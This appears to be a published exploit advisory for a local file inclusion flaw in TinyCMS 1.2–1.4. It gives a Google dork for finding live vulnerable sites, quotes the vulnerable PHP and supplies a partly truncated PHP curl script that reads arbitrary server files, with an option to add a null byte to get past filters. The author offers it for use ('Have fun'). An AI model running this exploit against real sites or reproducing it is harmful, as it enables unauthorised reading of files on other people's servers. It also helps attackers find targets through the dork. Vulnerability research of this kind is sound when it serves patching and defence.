[+] Exploit title: TinyCMS - Local File Inclusion [+] Date: 2/10/2012 [+] Author: Phizo [+] Vendor: http://www.tinycms.net/ [+] Version: 1.2 - 1.4 [+] Category: webapps [+] Google dork: intext:"Powered by TinyCMS" [+] Tested on: Windows 7 | Firefox 15.0.1 All current versions of TinyCMS seem to be affected by the following local file inclusion vulnerability. TinyCMS 1.0 and 1.1 are no longer available on the developer's website, however 1.2 to 1.4 remain today and are vulnerable. The option for omitting or including the null byte in the request was included because some web servers may have a WAF (Web Application Firewall) installed and/or magic quotes installed which may prevent inclusion of the desired file. The Google dork provided currently produces "About 4,510 results". The vulnerable code along with an exploit has been included. Have fun. ======================== index.php ~ lines 23-44 ======================== if(!isset($_SERVER['HTTP_X_REQUESTED_WITH'])) { ob_start(); @include 'tpl/wsl.tpl'; $page_content = ob_get_contents(); ob_end_clean(); echo $page_content; } else { header('content-type: application/json; charset=utf-8'); $page_data = array('pageName' => $_GET['page'], 'content' => ''); ob_start(); @include 'tpl/' . $_GET['page'] . '.html'; $page_data['content'] = ob_get_contents(); ob_end_clean(); echo json_encode($page_data); } } ================= Exploit code ================= {$options['u']}\n"; echo !isset($null) ? "[+] File -> {$file}\n" : "[+] File -> {$file}.html\n"; echo !isset($null) ? "[+] Null byte -> included\n" : "[+] Null byte -> omitted\n"; echo "\n[+] Submitting request...\n"; $handle = curl_init(); curl_setopt($handle, CURLOPT_URL, $url); curl_setopt($handle, CURLOPT_HTTPHEADER, $headers); curl_setopt($handle, CURLOPT_RETURNTRANSFER, true); $json = curl_exec($handle); curl_close($handle); $source = json_decode($json, true); echo "______________________________________________\n"; if(!empty($source['content'])) { if(!isset($output)) echo "{$source['content']}\n"; else file_put_contents($output, $source['content']); } else { die("\n[+] File could not be included.\n"); } echo "\n[+] Exploit completed.\n"; ?>